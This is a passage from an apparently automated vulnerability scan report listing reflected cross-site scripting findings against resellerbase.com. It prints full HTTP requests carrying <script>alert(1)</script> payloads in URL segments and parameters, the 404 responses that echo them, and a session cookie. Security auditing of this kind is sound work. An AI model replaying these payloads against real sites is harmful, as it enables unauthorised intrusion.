<p>The requested URL /detail/5/themes/kosmos/images/rating/search.php?keyword=search...6789d<a>1818c608f12&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3408. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 83e9f<script>alert(1)</script>b70666195e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&83e9f<script>alert(1)</script>b70666195e9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&83e9f<script>alert(1)</script>b70666195e9=1 was not found on this server.</p>
...[SNIP]...

2.3409. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ef0d9<a>8644c14f525 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ef0d9<a>8644c14f525 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ef0d9<a>8644c14f525 was not found on this server.</p>
...[SNIP]...

2.3410. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload afc77<script>alert(1)</script>8f7a69ba00b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailafc77<script>alert(1)</script>8f7a69ba00b/5/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailafc77<script>alert(1)</script>8f7a69ba00b/5/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.3411. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be40f<script>alert(1)</script>e6db0c2c242 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5be40f<script>alert(1)</script>e6db0c2c242/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5be40f<script>alert(1)</script>e6db0c2c242/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.3412. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ca612<script>alert(1)</script>6f87f7d9523 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themesca612<script>alert(1)</script>6f87f7d9523/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themesca612<script>alert(1)</script>6f87f7d9523/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.3413. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dc9c7<script>alert(1)</script>b4cc3f58cfd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmosdc9c7<script>alert(1)</script>b4cc3f58cfd/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmosdc9c7<script>alert(1)</script>b4cc3f58cfd/images/review/ was not found on this server.</p>
...[SNIP]...

2.3414. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload afc39<script>alert(1)</script>226ee5281de was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/imagesafc39<script>alert(1)</script>226ee5281de/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/imagesafc39<script>alert(1)</script>226ee5281de/review/ was not found on this server.</p>
...[SNIP]...

2.3415. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4d05e<script>alert(1)</script>d4702f0e196 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/review4d05e<script>alert(1)</script>d4702f0e196/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review4d05e<script>alert(1)</script>d4702f0e196/ was not found on this server.</p>
...[SNIP]...

2.3416. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4fd7b<script>alert(1)</script>92dfbd8b54c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/review/?4fd7b<script>alert(1)</script>92dfbd8b54c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/?4fd7b<script>alert(1)</script>92dfbd8b54c=1 was not found on this server.</p>
...[SNIP]...

2.3417. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0af7<script>alert(1)</script>93cf923b01d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf0af7<script>alert(1)</script>93cf923b01d/5/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf0af7<script>alert(1)</script>93cf923b01d/5/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.3418. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 74b15<script>alert(1)</script>132821824cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/574b15<script>alert(1)</script>132821824cd/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/574b15<script>alert(1)</script>132821824cd/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.3419. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3f6f4<script>alert(1)</script>9478dbb1e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes3f6f4<script>alert(1)</script>9478dbb1e2/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes3f6f4<script>alert(1)</script>9478dbb1e2/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.3420. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ebf86<script>alert(1)</script>fcdab35e9a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmosebf86<script>alert(1)</script>fcdab35e9a2/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmosebf86<script>alert(1)</script>fcdab35e9a2/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.3421. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8aebc<script>alert(1)</script>37a68337402 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images8aebc<script>alert(1)</script>37a68337402/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images8aebc<script>alert(1)</script>37a68337402/review/5.gif was not found on this server.</p>
...[SNIP]...

2.3422. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 992ae<script>alert(1)</script>b0e14acbc8f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/review992ae<script>alert(1)</script>b0e14acbc8f/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review992ae<script>alert(1)</script>b0e14acbc8f/5.gif was not found on this server.</p>
...[SNIP]...

2.3423. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3be61<script>alert(1)</script>5db3f56e96f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/review/5.gif3be61<script>alert(1)</script>5db3f56e96f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/5.gif3be61<script>alert(1)</script>5db3f56e96f was not found on this server.</p>
...[SNIP]...

2.3424. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/5.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 418cb<script>alert(1)</script>f27df6612c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/review/5.gif?418cb<script>alert(1)</script>f27df6612c2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/5.gif?418cb<script>alert(1)</script>f27df6612c2=1 was not found on this server.</p>
...[SNIP]...

2.3425. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7fcf4<script>alert(1)</script>2860846cb73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7fcf4<script>alert(1)</script>2860846cb73/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7fcf4<script>alert(1)</script>2860846cb73/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3426. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 53f1f<script>alert(1)</script>8b172081c06 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/553f1f<script>alert(1)</script>8b172081c06/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/553f1f<script>alert(1)</script>8b172081c06/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
